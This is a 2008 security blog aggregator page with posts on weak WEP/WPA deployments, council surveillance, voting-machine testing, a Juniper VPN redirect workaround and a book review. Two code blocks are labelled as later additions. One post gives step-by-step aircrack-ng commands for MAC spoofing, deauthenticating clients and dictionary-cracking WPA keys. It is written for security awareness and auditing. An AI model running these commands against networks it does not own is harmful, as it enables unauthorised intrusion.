by prithpal on August 31, 2008
in SBN
It’s been over two years now since presentations and tools related to WEP and WPA key cracking began to appear all over the internet and print media: tools for auditing wireless networks, tools for security auditing and of course tools for educational purposes only. Over a period of time, these tools got updated with better and more features.
Even after frequent reminders about the implications of WEP vulnerabilities, many administrators are still implementing WEP, or dictionary-based passwords in the case of WPA. My recent post about WPA Crack demonstrates the flaw of a weak password in a WPA implementation.
The point I am making here is: even though manufacturers of various wifi devices are aware of these facts, why are they still shipping their products with weak authentication protocols? I am sure it won’t take another round of VC funding to update firmware. In today’s scenario, all it takes is to make WPA2 the only authentication available in those devices, with the option of numerical and character-based passwords to avoid dictionary-based attacks.
But then, if there are no viruses there won’t be any antivirus in the market; likewise, many alternative devices and solutions have popped up lately for wifi security.
I guess it should be mandatory for manufacturers of wifi devices to comply with a strict policy of updating their products and firmware, especially in the case of products concerned with the first line of defense of a network.
by Frederick on August 31, 2008
in SBN
It's a good introduction for a non-specialist. It leaves some things out, and I spotted one really minor error, but it's worth your time.
by prithpal on August 30, 2008
in SBN
This video demonstrates WPA cracking using dictionary-based brute force; all tools used in the demonstration are available in Backtrack3.
Backtrack is an open source live Linux distro for security penetration testing. Backtrack took two of the best, Whax and Auditor, and merged them to make one meaningful distro that emerged as an ethical hacker's best choice for security auditing. It comes loaded with tools including network mapping, info gathering, vulnerability identification tools, and even some for Bluetooth hacking.
Commands used in the video (step by step):
1) airmon-ng stop wlan0
2) ifconfig wlan0 down
3) macchanger --mac 00:11:22:33:44:55 wlan0
4) airmon-ng start wlan0
5) airodump-ng wlan0
6) airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
7) aireplay-ng -0 5 -a (bssid) wlan0
8) aircrack-ng (filename-01.cap) -w (dictionary location)
Backtrack can be downloaded from here
by davehull on August 29, 2008
in SBN
by Frederick on August 29, 2008
in SBN
A three-year-old in Dorset, England, is having trouble sleeping at night. She's afraid there's a man outside watching her.
There's a reason. Government employees were following her family to and from school for three weeks, making records such as "female and three children enter target vehicle and drive off" and "curtains open and all lights on in premises".
But, we are told, we have to trade some privacy for security. Let's take a look at the public safety implications, and see if they justify following kids to school and scaring a three-year-old.
The surveillance was to assess whether the family really lived in the coverage area of the school they applied to. (They did, by the way).
The Poole borough spying case.
Ask tough questions if your government tells you they need to invade your privacy in the name of security.
by Frederick on August 29, 2008
in SBN
by Frederick on August 29, 2008
in SBN
I've written before about the limitations on the "certification" of voting machines.
There's been more talk about it recently.
Wired magazine's criticism of voting machine testing notes that problems go years without being fixed, and that the testing consists of going down a checklist that often has nothing to do with reliability or security. Worse, the software running in your election may be different from the software that got certified.
University of Iowa computer science professor Douglas Jones proposes testing procedures for voting machines including election-day tests aimed at catching malicious software that gives the right answers until it sees it's in a real election.
Nobody in those discussions mentions a key point. If you could make software reliable by testing it, we'd see a lot fewer bugs in our daily lives. Security is even harder to test for than reliability. A program can run just fine and be insecure.
The way to get secure software is to start at the design stage and build it from the ground up to resist or detect attack. For example, the software that adds up the vote totals from the precincts shouldn't allow the machine operator to change the totals without even creating a record of the change. One widely used design did allow that.
The next step in improving software security is to let qualified people, lots of them, look for hidden flaws. That includes cryptographers, but also the kinds of sideways-thinking people who like solving puzzles and doing things that are supposed to be impossible.
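As an added illustration of the design point above (not code from the original post or from any voting system), here is a tally store in which a total can only change through an operation that appends a hash-chained record. The class, method and field names are hypothetical.

```python
import hashlib
import json

GENESIS = "0" * 64  # "previous hash" used by the first log entry

def _digest(entry: dict) -> str:
    """SHA-256 over a canonical JSON encoding of the entry."""
    return hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()

class TallyLedger:
    """Hypothetical precinct tally: every change to a total leaves a chained record."""

    def __init__(self):
        self._totals = {}
        self.log = []  # change records, each carrying the hash of the one before

    def set_total(self, precinct, candidate, votes, operator, reason):
        key = f"{precinct}/{candidate}"
        entry = {
            "seq": len(self.log),
            "key": key,
            "old": self._totals.get(key),
            "new": votes,
            "operator": operator,
            "reason": reason,
            "prev": self.log[-1]["hash"] if self.log else GENESIS,
        }
        entry["hash"] = _digest(entry)  # computed before "hash" is part of the entry
        self.log.append(entry)
        self._totals[key] = votes

    def total(self, precinct, candidate):
        return self._totals.get(f"{precinct}/{candidate}")

    def verify(self):
        """Replay the log; return (ok, problem) for a broken chain or an unlogged change."""
        prev, replayed = GENESIS, {}
        for i, entry in enumerate(self.log):
            body = {k: v for k, v in entry.items() if k != "hash"}
            if entry["seq"] != i or entry["prev"] != prev or _digest(body) != entry["hash"]:
                return False, f"log entry {i} altered or out of order"
            if replayed.get(entry["key"]) != entry["old"]:
                return False, f"log entry {i} does not follow the previous total"
            replayed[entry["key"]] = entry["new"]
            prev = entry["hash"]
        if replayed != self._totals:
            return False, "totals differ from what the log records"
        return True, "ok"
```

A chain like this only shows tampering to someone who holds a trusted copy of the latest hash, so that value has to be recorded somewhere the machine operator cannot rewrite.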
by James.Costello on August 29, 2008
in SBN
My company does a lot of work with Juniper SSL implementations.
There has been some odd behavior in Firefox on Windows machines when connecting to Juniper SSL VPN. Immediately after login users are taken to a blank white page. The URL of the page contains data/home/starter0.cgi?check=yes . The page you should be redirected to includes data/home/starter.cgi?check=yes.
Juniper’s suggested workaround is to go back to the sign-in screen and log in again, or to remove the 0 from between starter and .cgi. Both are manual solutions; wouldn’t it be easier to have an automatic solution?
Well, here it is.
Download the Firefox add-on Redirector - https://addons.mozilla.org/en-US/firefox/addon/5064
After installation you will need to restart Firefox.
Open Redirector by right clicking on the R in the status bar in Firefox
Click Add…
The Example url is the full url you get stuck on i.e. https://this.ismyexample.com/data/home/starter0.cgi?check=yes
The Include Pattern is https://this.ismyexample.com/data/home/starter0.*
Redirect to is https://this.ismyexample.com/data/home/starter.cgi?check=yes
Set the Pattern Type to Wildcard and click Test pattern
You should get a message that indicates that the pattern matches. If not, go back and check your typing.
Click Ok
Click Close
Go back and log in again. You should go right past the page you were getting stuck at previously.
Be safe
James
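A redirect rule like the one in the steps above can be sanity-checked before it is saved: it should catch only the stuck page on the VPN host, and its target must not match the include pattern again. This is an added example, not part of the original post or the Redirector add-on; the function names, the assumed wildcard semantics and the sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

def wildcard_to_regex(pattern):
    # Assumed semantics: "*" matches any run of characters, everything else
    # is literal, and the whole URL has to match.
    return re.compile(".*".join(re.escape(part) for part in pattern.split("*")))

def check_rule(include, target, samples):
    """Return (problems, results); results maps each sample URL to where it ends up."""
    rx = wildcard_to_regex(include)
    problems = []
    if rx.fullmatch(target):
        problems.append("redirect target matches the include pattern (loop)")
    parts = urlsplit(include)
    if parts.scheme != "https" or not parts.netloc or "*" in parts.netloc:
        problems.append("include pattern is not pinned to one https host")
    results = {url: (target if rx.fullmatch(url) else url) for url in samples}
    return problems, results

# Values from the post, plus constructed sample URLs.
INCLUDE = "https://this.ismyexample.com/data/home/starter0.*"
TARGET = "https://this.ismyexample.com/data/home/starter.cgi?check=yes"
SAMPLES = [
    "https://this.ismyexample.com/data/home/starter0.cgi?check=yes",  # stuck page
    "https://this.ismyexample.com/data/home/starter.cgi?check=yes",   # wanted page
    "https://other.example/data/home/starter0.cgi?check=yes",         # different host
]

if __name__ == "__main__":
    problems, results = check_rule(INCLUDE, TARGET, SAMPLES)
    print(problems or "rule looks sane")
    for before, after in results.items():
        print(before, "->", after)
```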
by Dino Dai Zovi on August 29, 2008
in SBN
Chris Eagle’s long-awaited The IDA Pro Book has a very straightforward title, but it is perhaps the most descriptive title possible for this book. It is simply the IDA Pro book. The book weighs in at 640 pages and really does an excellent job of covering everything from the basic usage of IDA to using the SDK to extend IDA’s capabilities. While IDA Pro comes with documentation, it is nowhere near as comprehensive or easy to read.
Chris Eagle is clearly an excellent educator, as he makes the sometimes very dense and technically involved material easy to read and understand and also chooses his examples well. One of my personal favorites is an extended example on writing an IDA processor module for Python bytecode. The bytecode’s simple stack language made it easy to focus on the specifics of writing IDA processor modules without getting bogged down in architectural details. The amount of material spent on how to extend IDA is also unique to this book.
This book does not cover the basics of the x86 architecture and x86 assembly, so it is assumed that the reader is already familiar with it. The book also does not spend too much time on showing how to identify high-level language constructs (functions, C++ virtual methods, switch tables, loops, etc) in assembly. After all, this is a book on how to use IDA, not a book on how to read disassembly. For an extensive treatment on how to read disassembly, check out Kris Kaspersky’s Hacker Disassembling Uncovered or Eldad Eilam’s Reversing: Secrets of Reverse Engineering.
There are several skill levels of IDA Pro users: the casual (can follow string or import references to interesting functions), experienced (can use custom structures to make code easier to read), advanced (can turn assembly into C pseudocode manually), and professional (can write custom IDC scripts and plugins to automate repetitive and/or difficult tasks). This book makes getting to the higher levels much easier and should really be considered an essential purchase along with an IDA license for any serious user.
by Frederick on August 29, 2008
in SBN